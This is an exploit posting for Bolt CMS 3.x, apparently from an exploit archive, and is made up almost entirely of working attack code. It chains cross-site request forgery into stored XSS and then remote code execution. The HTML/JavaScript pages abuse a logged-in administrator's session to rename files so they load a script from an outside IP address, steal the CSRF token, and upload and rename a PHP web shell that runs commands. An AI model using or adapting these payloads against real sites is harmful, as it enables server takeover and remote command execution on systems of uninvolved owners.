Share
# Exploit Title: Bolt CMS 3.6.10 - Cross-Site Request Forgery  
# Date: 2019-10-15  
# Exploit Author: r3m0t3nu11[Zero-Way]  
# Vendor Homepage: https://bolt.cm/  
# Software Link: https://bolt.cm/  
# Version: up to date and 6.5  
# Tested on: Linux  
# CVE : N/A  
  
# last version  
  
# Csrf p0c  
<html>  
<body>  
<head>  
Bolt v 3.x exploit 0day  
</head>  
<h1>Bolt v 3.x csrf -> xss -> rce exploit</h1>  
<img src ="  
https://66.media.tumblr.com/8c1e5f1a62191b9091fd8736f8c4810b/tumblr_pf6q303FlE1vgbzx6o1_r1_400.jpg">  
  
<script>  
function submitRequest()  
{  
Csrf = async () => {  
const xhr = new XMLHttpRequest();  
xhr.open("POST",  
"http:\/\/127.0.0.1\/index.php\/async\/folder\/create",  
true);  
xhr.setRequestHeader("Accept", "*\/*");  
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");  
xhr.setRequestHeader("Content-Type",  
"application\/x-www-form-urlencoded; charset=UTF-8");  
xhr.withCredentials = true;  
var body = "parent=&foldername=sss&namespace=files";  
var aBody = new Uint8Array(body.length);  
for (var i = 0; i < aBody.length; i++)  
aBody[i] = body.charCodeAt(i);  
xhr.send(new Blob([aBody]));  
xhr.onreadystatechange = async (e) => {  
if (xhr.readyState === 4 && xhr.status === 200){  
  
};  
JSfuck1();  
}  
  
}  
JSfuck1 = async () => {  
const xhr = new XMLHttpRequest();  
xhr.open("POST", "http:\/\/127.0.0.1\/index.php\/async\/file\/create",  
true);  
xhr.setRequestHeader("Accept", "*\/*");  
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");  
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;  
charset=UTF-8");  
xhr.withCredentials = true;  
var body1 = "filename=aaa&parentPath=sss&namespace=files";  
xhr.send(body1);  
xhr.onreadystatechange = async (e) => {  
if (xhr.readyState === 4 && xhr.status === 200){  
  
}  
  
  
};  
where();  
}  
  
where = async () => {  
const xhr = new XMLHttpRequest();  
xhr.open("POST", "http:\/\/127.0.0.1\/index.php\/async\/file\/rename",  
true);  
xhr.setRequestHeader("Accept", "*\/*");  
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");  
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;  
charset=UTF-8");  
xhr.withCredentials = true;  
var body2 =  
"namespace=files&parent=sss&oldname=aaa&newname=aaa%3Cscript+src%3D'http%3A%26%23x2f%3B%26%23x2f%3B45.63.42.245%26%23x2f%3Bfinal.js'%3C%26%23x2f%3Bscript%3E.jpg";  
xhr.send(body2);  
  
}  
Csrf();  
}  
</script>  
<form action="#">  
<input type="button" value="Submit request"  
onclick="submitRequest();" />  
</form>  
</body>  
</html>  
  
JS p0c  
  
<script>  
Token = async () => {  
var xhr = new XMLHttpRequest();  
xhr.open("GET", "\/index.php\/bolt\/files", true);  
xhr.responseType = "document";  
xhr.withCredentials=true;  
xhr.onreadystatechange = async (e) => {  
if (xhr.readyState === 4 && xhr.status === 200){  
doc = xhr.response;  
token = doc.getElementsByName("file_upload[_token]")[0].value;  
upload(token);  
console.log(token);  
  
}  
};  
xhr.send();  
}  
  
  
  
upload = async (csrfToken) =>{  
var body =  
"-----------------------------190530466613268610451083392867\r\n" +  
"Content-Disposition: form-data; name=\"file_upload[select][]\";  
filename=\"r3m0t3nu11.txt\"\r\n" +  
"Content-Type: text/plain\r\n" +  
"\r\n" +  
"<?php system($_GET['test']);?>\r\n" +  
"-----------------------------190530466613268610451083392867\r\n"  
+  
"Content-Disposition: form-data;  
name=\"file_upload[upload]\"\r\n" +  
"\r\n" +  
"\r\n" +  
"-----------------------------190530466613268610451083392867\r\n"  
+  
"Content-Disposition: form-data;  
name=\"file_upload[_token]\"\r\n" +  
"\r\n" +  
token  
  
"-----------------------------190530466613268610451083392867--\r\n";  
  
const xhr = new XMLHttpRequest();  
xhr.open("POST", "http:\/\/127.0.0.1\/index.php\/bolt\/files", true);  
xhr.setRequestHeader("Accept",  
"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");  
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");  
xhr.setRequestHeader("Content-Type", "multipart\/form-data;  
boundary=---------------------------190530466613268610451083392867");  
xhr.withCredentials = true;  
xhr.onreadystatechange = async (e) => {  
if (xhr.readyState === 4 && xhr.status === 200){  
Shell();  
}  
  
};  
  
var aBody = new Uint8Array(body.length);  
for (var i = 0; i < aBody.length; i++)  
aBody[i] = body.charCodeAt(i);  
xhr.send(new Blob([aBody]));  
  
}  
  
  
Shell = async () => {  
const xhr = new XMLHttpRequest();  
xhr.open("POST", "http:\/\/127.0.0.1/index.php/async/file/rename", true);  
xhr.setRequestHeader("Accept", "*\/*");  
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");  
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;  
charset=UTF-8");  
xhr.withCredentials = true;  
xhr.timeout = 4000;  
var body1 =  
"namespace=files&parent=&oldname=r3m0t3nu11.txt&newname=dd%2Fphp-exif-systemasjpg%2Faa%2Fphp-exif-system.php%2Faaa.jpg";  
xhr.send(body1);  
bypass();  
}  
  
bypass = async () => {  
const xhr = new XMLHttpRequest();  
xhr.open("POST", "http:\/\/127.0.0.1/index.php/async/folder/rename", true);  
xhr.setRequestHeader("Accept", "*\/*");  
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");  
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;  
charset=UTF-8");  
xhr.withCredentials = true;  
xhr.timeout = 4000;  
var body1 =  
"namespace=files&parent=dd%2Fphp-exif-systemasjpg%2Faa/php-exif-system.php%2f&oldname=aaa.jpg&newname=bypass.php";  
xhr.send(body1);  
bypass2();  
}  
  
bypass2 = async () => {  
const xhr = new XMLHttpRequest();  
xhr.open("POST", "http:\/\/127.0.0.1/index.php/async/folder/rename", true);  
xhr.setRequestHeader("Accept", "*\/*");  
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");  
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;  
charset=UTF-8");  
xhr.withCredentials = true;  
xhr.timeout = 4000;  
var body1 =  
"namespace=files&parent=dd%2Fphp-exif-systemasjpg%2Faa/&oldname=php-exif-system.php&newname=bypass1";  
xhr.send(body1);  
  
}  
  
  
  
Token();  
</script>  
  
  
version 6.5  
  
CSrf p0c  
<html>  
<body>  
<head>  
Bolt v 3.x CVE-2019-17591 exploit  
</head>  
<h1>Bolt v 3.x csrf -> xss -> rce exploit</h1>  
<img src ="  
https://66.media.tumblr.com/8c1e5f1a62191b9091fd8736f8c4810b/tumblr_pf6q303FlE1vgbzx6o1_r1_400.jpg">  
  
<script>  
function submitRequest()  
{  
Csrf = async () => {  
const xhr = new XMLHttpRequest();  
xhr.open("POST",  
"http:\/\/bolt-4mti18.bolt.dockerfly.com\/async\/file\/create",  
true);  
xhr.setRequestHeader("Accept", "*\/*");  
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");  
xhr.setRequestHeader("Content-Type",  
"application\/x-www-form-urlencoded; charset=UTF-8");  
xhr.withCredentials = true;  
var body = "filename=test&parentPath=&namespace=files";  
var aBody = new Uint8Array(body.length);  
for (var i = 0; i < aBody.length; i++)  
aBody[i] = body.charCodeAt(i);  
xhr.send(new Blob([aBody]));  
xhr.onreadystatechange = async (e) => {  
if (xhr.readyState === 4 && xhr.status === 200){  
JSfuck();  
}  
};  
  
  
}  
JSfuck = async () => {  
const xhr = new XMLHttpRequest();  
xhr.open("POST",  
"http:\/\/bolt-4mti18.bolt.dockerfly.com\/async\/file\/rename",  
true);  
xhr.setRequestHeader("Accept", "*\/*");  
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");  
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;  
charset=UTF-8");  
xhr.withCredentials = true;  
var body1 = "namespace=files&parent=&oldname=test&newname=<img src='x'  
onerror=alert(1)>";  
xhr.send(body1);  
  
}  
Csrf();  
}  
</script>  
<form action="#">  
<input type="button" value="Submit request"  
onclick="submitRequest();" />  
</form>  
</body>  
</html>  
  
Js p0c  
  
  
<script>  
Token = async () => {  
var xhr = new XMLHttpRequest();  
xhr.open("GET", "\/bolt\/files", true);  
xhr.responseType = "document";  
xhr.withCredentials=true;  
xhr.onreadystatechange = async (e) => {  
if (xhr.readyState === 4 && xhr.status === 200){  
doc = xhr.response;  
token = doc.getElementsByName("file_upload[_token]")[0].value;  
upload(token);  
console.log(token);  
  
}  
  
  
}  
xhr.send(null);  
}  
  
  
  
upload = async (csrfToken) =>{  
var body =  
"-----------------------------190530466613268610451083392867\r\n" +  
"Content-Disposition: form-data; name=\"file_upload[select][]\";  
filename=\"r3m0t3nu11.txt\"\r\n" +  
"Content-Type: text/plain\r\n" +  
"\r\n" +  
"<?php system($_GET['test']);?>\r\n" +  
"-----------------------------190530466613268610451083392867\r\n"  
+  
"Content-Disposition: form-data;  
name=\"file_upload[upload]\"\r\n" +  
"\r\n" +  
"\r\n" +  
"-----------------------------190530466613268610451083392867\r\n"  
+  
"Content-Disposition: form-data;  
name=\"file_upload[_token]\"\r\n" +  
"\r\n" +  
token  
  
"-----------------------------190530466613268610451083392867--\r\n";  
  
const xhr = new XMLHttpRequest();  
xhr.open("POST", "http:\/\/127.0.0.1\/bolt\/files", true);  
xhr.setRequestHeader("Accept",  
"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");  
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");  
xhr.setRequestHeader("Content-Type", "multipart\/form-data;  
boundary=---------------------------190530466613268610451083392867");  
xhr.withCredentials = true;  
xhr.onreadystatechange = async (e) => {  
if (xhr.readyState === 4 && xhr.status === 200){  
Shell();  
}  
};  
var aBody = new Uint8Array(body.length);  
for (var i = 0; i < aBody.length; i++)  
aBody[i] = body.charCodeAt(i);  
xhr.send(new Blob([aBody]));  
}  
  
  
  
  
Shell = async () => {  
const xhr = new XMLHttpRequest();  
xhr.open("POST", "http:\/\/127.0.0.1/\/async\/file\/rename", true);  
xhr.setRequestHeader("Accept", "*\/*");  
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");  
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;  
charset=UTF-8");  
xhr.withCredentials = true;  
var body1 =  
"namespace=files&parent=%2f&oldname=r3m0t3nu11.txt&newname=b.php";  
xhr.send(body1);  
}  
Token();  
</script>  
  
proof of concept :  
  
https://drive.google.com/file/d/1TRjzOM-q8cWK1JA9cN1Auhp7Ao3AXtbp/view?usp=sharing  
  
https://drive.google.com/file/d/1QSE7Dnx0XZth9WciaohjhA6nk_-9jCr1/view?usp=sharing  
  
Greetz to :  
Samir-dz,YokO,0n3,Mr_Hex,syfi2k,Q8Librarian,Dr_hEx,dracula1337,z0mbi3_h4ck3r,Red  
Virus,m7md1337,D3vil1337,and all my friends